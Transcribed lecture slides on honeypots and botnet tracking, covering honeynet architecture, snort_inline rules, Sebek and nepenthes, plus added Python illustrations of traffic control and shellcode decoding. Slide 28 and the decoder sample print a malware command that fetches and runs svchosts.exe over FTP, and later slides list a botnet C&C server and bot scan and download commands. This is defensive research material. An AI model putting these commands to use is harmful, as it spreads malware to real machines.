Honeypots: A quick overview
Pi1 - Laboratory for Dependable Distributed Systems, Universität Mannheim

Transcription of the slides

2 Outline
- Motivation
- High-interaction vs. low-interaction honeypots
- Gen III honeynets
- honeyd
- nepenthes
- Examples

3 Intro
- We see more and more abuse of communication systems, but we only see the outcome:
  - Spam and phishing
  - Bots and botnets
  - Crackers exploiting vulnerabilities ...
- How can we learn more about this threat? Know your enemy.

4 Basic Problem
How can we defend against an enemy when we don't even know who the enemy is?

5 Honeypot History
- The Cuckoo's Egg (Clifford Stoll)
- DTK (Fred Cohen)
- Honeyd (Niels Provos)
- Honeynet Project
- Mantrap (jails - Symantec)
- Specter (Netsec - specter.com)
- KFSensor (Keyfocus.net)
- Network telescopes / sinkholes
- Large setups at AV companies

Definition: "A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource."

6 High- vs. low-interaction
The fundamental difference

7 Different Approaches

High-interaction                            | Low-interaction
--------------------------------------------+-------------------------------------------------
Real services, OSs, or applications         | Emulation of TCP/IP stack, vulnerabilities, ...
Higher risk                                 | Lower risk
Hard to deploy / maintain                   | Easy to deploy / maintain
Capture extensive amount of information     | Capture quantitative information about attacks
Example: Gen III honeynets                  | Examples: honeyd, nepenthes, labrea, ...

8 Honeynets
- Network of high-interaction honeypots designed to capture in-depth information
- Information has different value to different organizations
- It is an architecture you populate with live systems, not a product or software
- Any traffic entering or leaving is suspect

9 GenIII Architecture
[Figure: setup at the German Honeynet Project]

10 Concept
- A honeynet is a highly controlled network
- Every packet that enters or leaves the network is by definition suspicious
- Three basic building blocks, all implemented on the Honeywall:
  - Data Control
  - Data Capture
  - Data Analysis

11 Honeywall
- Transparent bridge: the easiest way to deploy a Honeywall
- Linux 2.6, or 2.4 with the ebtables patch
- Hardened system
- Three interfaces: two for the bridge/routing path, one for management
- GenIII honeynets: Roo Honeywall CDROM (more on that later)

12 Data Control
- What happens after a compromise? The honeypot itself is now possibly malicious!
- Legal issues?

13 Data Control
- Data Control provides the mechanisms to control incoming and outgoing traffic
- Goal: mitigate the risk that a compromised honeypot harms third parties
- Implemented with an IPS: snort_inline

14 Data Control: snort_inline
- snort_inline: modification of the IDS Snort that processes packets inline (handed over by iptables) instead of only sniffing them
- New rule actions: drop, replace and reject
- Example rules used for botnet tracking:

    alert tcp $HOME any <> $EXTERNAL any (msg:"irc topic"; flow:established; content:"topic"; nocase; replace:"t0pic";)
    drop tcp $HOME any <> $EXTERNAL 445 (msg:"bot-scan"; flow:established;)

The first rule keeps the bot's IRC session alive but rewrites the keyword "topic" in flight, so commands distributed through the channel topic never reach the bot in usable form; the replacement must have the same length as the matched content because snort_inline patches the payload in place and must not invalidate TCP sequence numbers. The second rule drops the bot's own connections to port 445 on external hosts (propagation attempts), while attacks against the honeypot's port 445 are not matched and still get through.

15 Data Control
- In addition to exploits, DDoS attacks launched from the compromised honeypot also pose a threat
- Connection limiting via iptables
- Allow some outgoing connections, so that the attacker can fetch tools and connect to IRC
- Limits as configured on the Honeywall:

    ### Set the connection outbound limits for different protocols.
    SCALE="day"
    TCPRATE="15"
    UDPRATE="20"
    ICMPRATE="50"
    OTHERRATE="15"   # IPsec, IPv6 tunnel, and other protocols that are not IP proto 1, 6, 17
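To make the interplay of the two Data Control layers concrete, here is an added Python model of the Honeywall policy just described: the per-protocol limit on new outbound connections from the iptables script, followed by the two snort_inline rules (the in-place "topic" rewrite and the outbound port 445 drop). This is illustration code written for this page, not code from the slides, the Honeywall or snort_inline; the honeypot addresses, the daily counting window and the traffic in demo() are constructed assumptions.

```python
import re
from collections import Counter

# Constructed honeynet addresses (assumption; the slides name no hosts).
HOME_NET = {"10.0.0.5", "10.0.0.6"}

# Outbound NEW-connection limits per protocol, from the variables on the
# slide (TCPRATE=15, UDPRATE=20, ICMPRATE=50, OTHERRATE=15, SCALE=day).
OUTBOUND_LIMITS = {"tcp": 15, "udp": 20, "icmp": 50, "other": 15}


class DataControl:
    """Inline policy modelling the Honeywall: iptables connection limiting
    first, then the two snort_inline rules.  handle() returns the verdict
    ("pass", "drop" or "replace") and the payload that leaves the bridge."""

    def __init__(self):
        # counts NEW outbound connections per protocol within one SCALE window
        self.new_connections = Counter()

    def handle(self, src, dst, proto, sport=0, dport=0, payload=b"", new_conn=False):
        outbound = src in HOME_NET and dst not in HOME_NET
        inbound = dst in HOME_NET and src not in HOME_NET

        # iptables: only NEW outbound connections are counted; inbound traffic
        # (the attacks we want to see) is never rate-limited.
        if outbound and new_conn:
            self.new_connections[proto] += 1
            limit = OUTBOUND_LIMITS.get(proto, OUTBOUND_LIMITS["other"])
            if self.new_connections[proto] > limit:
                return "drop", payload

        if proto != "tcp":
            return "pass", payload

        # drop tcp $HOME any <> $EXTERNAL 445: both directions of a connection
        # between a honeypot and port 445 of an external host, i.e. the bot's
        # own propagation attempts.  An attack *to* the honeypot's port 445
        # ($EXTERNAL any -> $HOME 445) does not match and still gets through.
        if (outbound and dport == 445) or (inbound and sport == 445):
            return "drop", payload

        # alert ... content:"topic"; nocase; replace:"t0pic": snort_inline
        # overwrites the matched bytes in place.  The replacement has the same
        # length, so TCP sequence numbers stay valid and the connection stays
        # up; the bot simply never receives a usable command.
        rewritten, n = re.subn(rb"topic", b"t0pic", payload, count=1, flags=re.IGNORECASE)
        if n:
            return "replace", rewritten
        return "pass", payload


def demo():
    """Constructed day of traffic: the bot on the honeypot opens outbound
    connections, receives a channel topic, and tries to spread over 445."""
    log = []
    limiter = DataControl()
    for i in range(16):   # only the first 15 outbound TCP connections of the day pass
        v, _ = limiter.handle("10.0.0.5", "198.51.100.7", "tcp",
                              sport=40000 + i, dport=80, new_conn=True)
        log.append(("outbound-tcp", v))
    rules = DataControl()
    v, p = rules.handle("192.0.2.44", "10.0.0.5", "tcp", sport=6667, dport=1031,
                        payload=b"TOPIC #xport :.scan netapi r -b -s")
    log.append(("irc-topic", v, p))
    v, _ = rules.handle("10.0.0.5", "203.0.113.9", "tcp", sport=1030, dport=445, new_conn=True)
    log.append(("bot-scan", v))
    v, _ = rules.handle("203.0.113.9", "10.0.0.5", "tcp", sport=3344, dport=445, new_conn=True)
    log.append(("inbound-attack", v))
    return log


if __name__ == "__main__":
    for entry in demo():
        print(*entry)
```

The order matters: the connection limit is enforced by iptables before the packet ever reaches snort_inline, which is why an over-limit scan is dropped regardless of port, and why the limits must leave enough headroom for the attacker's tool download and IRC login that the honeynet exists to observe.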

16 Data Capture
- How do you observe an intruder without him noticing?
- How can you observe encrypted sessions? tcpdump/tethereal is worthless there
- How can you observe the keystrokes?
- How can you observe the execution flow of a program?

17 Data Capture: Sebek
- Simple scripts can't log the activity of programs
- Use rootkit techniques to observe the intruder!
- Sebek: hidden kernel module that captures (almost) all activity
- Dumps the captured activity to the network
- The attacker can't sniff this traffic, since the TCP/IP stack of every honeypot is modified to hide it

18 Data Capture: Sebek
[Figure 2]

19 Data Capture: Sebek
[Figure 3, from Thorsten Holz: Reaktive Sicherheit - Honeynets, Universität Dortmund]

20 Data Analysis
- Most of the work has to be done in the area of Data Analysis
- Lots of manual analysis: tethereal, p0f, tcpflow, custom scripts, ...
- Analysis of IRC logs
- Analysis of obtained tools
- Profiling of attackers? ...

21 Roo Honeywall
- Based on Fedora Core 3
- Automated, headless installation
- Web-based interface ("Walleye") for administration and Data Analysis
- Balas, Viecco: Towards a Third Generation Data Capture Architecture for Honeynets, IEEE Information Assurance Workshop, 2005

22 Low-interaction
- No real systems, just emulation
- honeyd
  - Emulation of TCP/IP stacks
  - Fools fingerprinting tools like nmap
  - Scripts can simulate services
- nepenthes
  - Emulates the vulnerable parts of services
  - Collects autonomously spreading malware

23 nepenthes
- Tool to automatically collect malware like bots and other autonomously spreading malware
- Emulates known vulnerabilities and downloads the malware that tries to exploit these vulnerabilities
- Available at

24 Architecture
- Modular architecture:
  - Vulnerability modules
  - Shellcode handlers
  - Download modules
  - Submission modules
  - Trigger events
  - Shell emulation and virtual filesystem

25 Schematic overview
[Figure]

26 Vulnerability modules
- Emulate vulnerable services
- Play along with the exploit until it sends us its payload (finite state machine)
- Currently more than 20 vulnerability modules available, more in development
- Analysis of known vulnerabilities and exploits is necessary to write them
- Automation possible?

27 Shellcode modules
- Automatically extract the URL the malware uses to transfer itself to the compromised machine
- sch_generic_xor: generic XOR decoder
- sch_generic_createprocess
- sch_generic_url
- sch_generic_cmd

28 Shellcode handling in practice (nepenthes dialogue log of a captured payload)
[ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] =
[ dia ] 0x0000   .SMB.s...            SMB request carrying the exploit
[ dia ] 0x0410   AAAAAAAA AAAAAAAA    padding in front of the shellcode
[ dia ] [...]
[ dia ] 0x0480 - 0x04f0               position-independent API resolver (PEB walk via fs:[0x30], export-table hashing)
[ dia ] 0x0500   ..cmd /c echo op
[ dia ] 0x0510   en <server> <port>   (server and port blanked on the slide)
[ dia ] 0x0520    >> ii &ech
[ dia ] 0x0530   o user a a >> ii
[ dia ] 0x0540   &echo b inary >>
[ dia ] 0x0550    ii &ech o get sv
[ dia ] 0x0560   chosts.e xe >> ii
[ dia ] 0x0570   &echo b ye >> ii
[ dia ] 0x0580   &ftp -n -v -s:i
[ dia ] 0x0590   i &del i i &svcho
[ dia ] 0x05a0   sts.exe...BBBBBB
[ dia ] 0x05b0   BBBBBBBB BBBBBBBB    padding after the shellcode
(hex columns are garbled in the transcription; offsets and the ASCII column are kept)

Decoded command carried by the shellcode:
    cmd /c echo open <server> <port> >> ii &echo user a a >> ii &echo binary >> ii &echo get svchosts.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &svchosts.exe

URL extracted by the shellcode handler: ftp://a:a@<server>/svchosts.exe
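The following Python, added here as an illustration and not taken from nepenthes or the slides, reproduces the handler chain the two preceding slides describe on a payload of the kind shown in the dump: a single-byte XOR decoder (sch_generic_xor), reassembly of the "echo ... >> ii" FTP script into a download URL (sch_generic_cmd), and a fallback for a URL embedded directly in the payload (sch_generic_url). The sample payload, the server address 192.0.2.10:3245 that stands in for the values blanked on the slide, the XOR key and the brute-force key search (nepenthes instead recognises known decoder stubs and reads the key from them) are assumptions made for this example.

```python
import re

# Constructed sample payload: the FTP download script that is visible in the
# ASCII column of the dump above.  The slide blanks the server address and
# port; 192.0.2.10:3245 stands in for them (assumption).
FTP_SCRIPT = (
    b"cmd /c echo open 192.0.2.10 3245 >> ii &echo user a a >> ii "
    b"&echo binary >> ii &echo get svchosts.exe >> ii &echo bye >> ii "
    b"&ftp -n -v -s:ii &del ii &svchosts.exe\r\n"
)
MARKER = b"cmd /c echo open"   # how a decoded FTP download script starts
URL_RE = re.compile(rb"(?:https?|ftp|tftp)://[\x21-\x7e]+")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build_sample_shellcode(key: int = 0x99) -> bytes:
    """Stand-in for a captured payload: a fake decoder stub, the single-byte
    XOR encoded script, and padding like the 'BBBB' tail in the dump."""
    stub = b"\xeb\x0d" + b"\x90" * 8
    return stub + xor_bytes(FTP_SCRIPT, key) + b"B" * 16


def find_xor_key(blob: bytes):
    """sch_generic_xor, simplified: nepenthes matches known decoder stubs and
    reads the key out of them; here every single-byte key is tried and the
    first one exposing a download script or URL wins.  Key 0 = not encoded."""
    for key in range(256):
        decoded = xor_bytes(blob, key)
        if MARKER in decoded or URL_RE.search(decoded):
            return key, decoded
    return None, blob


def parse_ftp_script(decoded: bytes):
    """sch_generic_cmd: reassemble the FTP command file the shellcode writes
    line by line with 'echo ... >> ii' and turn it into a download URL."""
    m = re.search(rb"cmd /c (.*?)(?:\r\n|\x00)", decoded, re.DOTALL)
    if not m:
        return None
    cmdline = m.group(1).decode("latin-1")
    host = user = password = filename = None
    port = 21
    for cmd, _target in re.findall(r"echo ([^&>]+?)\s*>>\s*(\S+)", cmdline):
        parts = cmd.split()
        if parts[0] == "open" and len(parts) >= 2:
            host = parts[1]
            if len(parts) > 2:
                port = int(parts[2])
        elif parts[0] == "user" and len(parts) >= 2:
            user, password = parts[1], (parts[2] if len(parts) > 2 else "")
        elif parts[0] == "get" and len(parts) >= 2:
            filename = parts[1]
    if not (host and filename):
        return None
    return {
        "download_url": f"ftp://{user}:{password}@{host}:{port}/{filename}",
        "execute": cmdline.split("&")[-1].strip(),  # binary started after the download
    }


def analyze_shellcode(blob: bytes) -> dict:
    """The handler chain a nepenthes shellcode module runs on a payload."""
    key, decoded = find_xor_key(blob)
    result = {"xor_key": key, "download_url": None, "execute": None}
    if key is None:
        return result
    parsed = parse_ftp_script(decoded)
    if parsed:
        result.update(parsed)
    else:
        m = URL_RE.search(decoded)   # sch_generic_url: URL embedded directly
        if m:
            result["download_url"] = m.group(0).decode("latin-1")
    return result


if __name__ == "__main__":
    print(analyze_shellcode(build_sample_shellcode()))
```

The extracted URL is what the download modules then fetch and the submission modules hand on; note that the credentials and file name are taken from the script the malware itself wrote, so no guessing is involved once the decoding step has succeeded.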

29 Statistics: nepenthes
- Four months of nepenthes on a /18 network:
  - 50,000,000+ files downloaded
  - 14,000+ unique binaries, based on md5sum (MD5 counts every repacked variant as a new binary, so this overstates the number of distinct malware families)
  - ~1,000 different botnets
- Anti-virus engines detect between 70% and 90% of the binaries
- Korgobot/Padobot dominates

30 Examples
What have we learned?

31 Phishing
- Phishing incidents in the UK and Germany
- Compromise -> phishing website -> phishing e-mails, or redirection of traffic
- Learned more about the typical proceeding of attackers

32 Botnets
- Botnet: network of compromised machines that can be remotely controlled by an attacker
- Mainly used for DDoS, spam, identity theft, ...
- Capture bot samples with the help of honeypots
- Observe botnets for mitigation
[Figure: attacker -> IRC C&C server (hax0r.example.com, 3267/TCP) -> bots; command shown: $advscan dcom b]

33 Conclusion
- Honeypots allow us to learn more about attacks
- Lure in attackers and study them in a fish-bowl environment
- Easy to set up; maintenance is harder
- We can, for example, learn more about phishing and the proceeding of attackers
- Other use cases for honeypots include credit card fraud, collecting malware, botnet tracking, web-based attacks, client-side attacks, ...

34 Thorsten Holz
More information: Pi1 - Laboratory for Dependable Distributed Systems
35 CWSandbox

36 Example: Mocbot & MS06-040

37 Introduction
- MS Security Bulletin MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (August 8, 2006)
- PoC exploit released a couple of days later
- Botnets quickly adopt the new infection vector
- Now: tracking of one botnet that uses this vulnerability
  - C&C server: gzn.lx.irc-xxx.org:45130
  - Main channel: ##Xport##
  - Nick format: RBOT|DEU|XP-SP

38 ##Xport## (join messages captured within ten minutes; the hostname after "running on:" is blanked)
00:06 < RBOT|JPN|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:06 < RBOT|USA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|USA|2K-90511 > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|ITA|2K-89428 > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|PRT|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|F|USA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|USA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|JPN|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:07 < RBOT|FRA|2K-22302 > [Main]: This is the first time that Rbot v2 is running on:
00:08 < RBOT|ESP|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:08 < RBOT|GBR|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:08 < RBOT|USA|2K-54815 > [Main]: This is the first time that Rbot v2 is running on:
00:08 < RBOT|ESP|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:08 < RBOT|ITA|2K-39418 > [Main]: This is the first time that Rbot v2 is running on:
00:08 < RBOT|F|ESP|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:09 < RBOT|BRA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:09 < RBOT|USA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:09 < RBOT|DEU|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:10 < RBOT|ESP|2K-80303 > [Main]: This is the first time that Rbot v2 is running on:
00:10 < RBOT|ESP|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:11 < RBOT|CHN|2K-65840 > [Main]: This is the first time that Rbot v2 is running on:
00:11 < RBOT|USA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:11 < RBOT|F|ESP|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:11 < RBOT|VEN|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:11 < RBOT|FRA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:12 < RBOT|JPN|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:13 < RBOT|DEU|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:13 < RBOT|USA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:13 < RBOT|ITA|2K-77534 > [Main]: This is the first time that Rbot v2 is running on:
00:13 < RBOT|DNK|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:13 < RBOT|ESP|XP-SP > [Main]: This is the first time that Rbot v2 is running on:
00:15 < RBOT|JPN|2K-94205 > [Main]: This is the first time that Rbot v2 is running on:
00:15 < RBOT|BRA|XP-SP > [Main]: This is the first time that Rbot v2 is running on:

39 Channels
##Xport##: .ircraw join ##scan##,##dr##,##frame##,##o##
##scan##:  .scan netapi r -b -s $$
##DR##:    .download webmasterexe/drsmartload152a.exe c:\dr.exe 1 -s $$
##frame##: .download loadadv518.exe c:\frm.exe 1 -s *
##o##:     .download nads.exe c:\nds.exe 1 -s
40 DollarRevenue

41 Economics of Botnets
$ grep US log | wc -l
998
$ grep CAN log | wc -l
20
$ grep GBR log | wc -l
103
$ grep CHN log | wc -l
756
$ egrep -v "US|CAN|GBR|CHN" log | wc -l

(bots per country, multiplied by the per-install payout the affiliate program pays for that country)
* * * * * 0.02 = $
More informationSECURING APACHE : DOS & DDOS ATTACKS - II
SECURING APACHE : DOS & DDOS ATTACKS - II How DDoS attacks are performed A DDoS attack has to be carefully prepared by the attackers. They first recruit the zombie army, by looking for vulnerable machines,
More informationHONEYPOTS The new-way Security Analysis
HONEYPOTS The new-way Security Analysis By D.R.Esesve B.Tech (ECE), MPIT (Networking Technology) dresesve@hotmail.com http://www.geocities.com/dresesve Symbiosis Center for Information Technology, Pune
More informationLinux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
More informationFirewalls & Intrusion Detection
Firewalls & Intrusion Detection CS 594 Special Topics/Kent Law School: Computer and Network Privacy and Security: Ethical, Legal, and Technical Consideration 2007, 2008 Robert H. Sloan Security Intrusion
More informationBotNets- Cyber Torrirism
BotNets- Cyber Torrirism Battling the threats of internet Assoc. Prof. Dr. Sureswaran Ramadass National Advanced IPv6 Center - Director Why Talk About Botnets? Because Bot Statistics Suggest Assimilation
More informationIPv6 Intrusion Detection Research Project
IPv6 Intrusion Detection Research Project Carsten Rossenhövel, EANTC AG Sven Schindler, Universität Potsdam Co-Financed By: Project Goals Independently assess the true, current risks of IPv6 attacks Develop
More informationUNMASKCONTENT: THE CASE STUDY
DIGITONTO LLC. UNMASKCONTENT: THE CASE STUDY The mystery UnmaskContent.com v1.0 Contents I. CASE 1: Malware Alert... 2 a. Scenario... 2 b. Data Collection... 2 c. Data Aggregation... 3 d. Data Enumeration...
More informationBotHunter: Detecting Malware Infection Through IDS-Driven Dialog Correlation
BotHunter: Detecting Malware Infection Through IDS-Driven Dialog Correlation Guofei Gu, Phillip Porras, Vinod Yegneswaran, Martin Fong, Wenke Lee USENIX Security Symposium (Security 07) Presented by Nawanol
More informationRadware Security Research. Reverse Engineering a Sophisticated DDoS Attack Bot. Author: Zeev Ravid
Reverse Engineering a Sophisticated DDoS Attack Bot Author: Zeev Ravid July 2015 Introduction In July 2015, Radware s Emergency Response Team (ERT) noticed a significant increased usage of the Tsunami
More informationA Pointillist Approach for Comparing Honeypots. Fabien Pouget, Thorsten Holz
A Pointillist Approach for Comparing Honeypots Fabien Pouget, Thorsten Holz Motivations What are the Modus Operandi of the perpetrators? Who has data to validate in a rigorous way any kind of taxonomy
More informationA Critical Investigation of Botnet
Global Journal of Computer Science and Technology Network, Web & Security Volume 13 Issue 9 Version 1.0 Year 2013 Type: Double Blind Peer Reviewed International Research Journal Publisher: Global Journals
More informationGetting Ahead of Malware
IT@Intel White Paper Intel Information Technology Security December 2009 Getting Ahead of Malware Executive Overview Since implementing our security event monitor and detection processes two years ago,
More informationNetwork Security Controls. CSC 482: Computer Security
Network Security Controls Topics 1. Firewalls 2. Virtual Private Networks 3. Intrusion Detection and Prevention 4. Honeypots What is a Firewall? A software or hardware component that restricts network
More informationAttacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
More informationDetecting Zero-Day Attack Signatures using Honeycomb in a Virtualized Network
Detecting Zero-Day Attack Signatures using Honeycomb in a Virtualized Network Reshma R. Patel Information Technology Department, L.D.College of Engineering, Ahmedabad, India. Chirag S. Thaker Information
More information2. From a control perspective, the PRIMARY objective of classifying information assets is to:
MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected
More informationAppendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003
http://technet.microsoft.com/en-us/library/cc757501(ws.10).aspx Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 Updated: October 7, 2005 Applies To: Windows Server 2003 with
More informationIntegrated Approach to Network Security. Lee Klarich Senior Vice President, Product Management March 2013
Integrated Approach to Network Security Lee Klarich Senior Vice President, Product Management March 2013 Real data from actual networks 2 2012, Palo Alto Networks. Confidential and Proprietary. 2008: HTTP,
More informationIntrusion Detection Systems
Intrusion Detection Systems Advanced Computer Networks 2007 Reinhard Wallner reinhard.wallner@student.tugraz.at Outline Introduction Types of IDS How works an IDS Attacks to IDS Intrusion Prevention Systems
More informationNetworking for Caribbean Development
Networking for Caribbean Development BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n o g. o r g N E T W O R K I N G F O R C A R I B B E A N D E V E L O P M E N T BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More information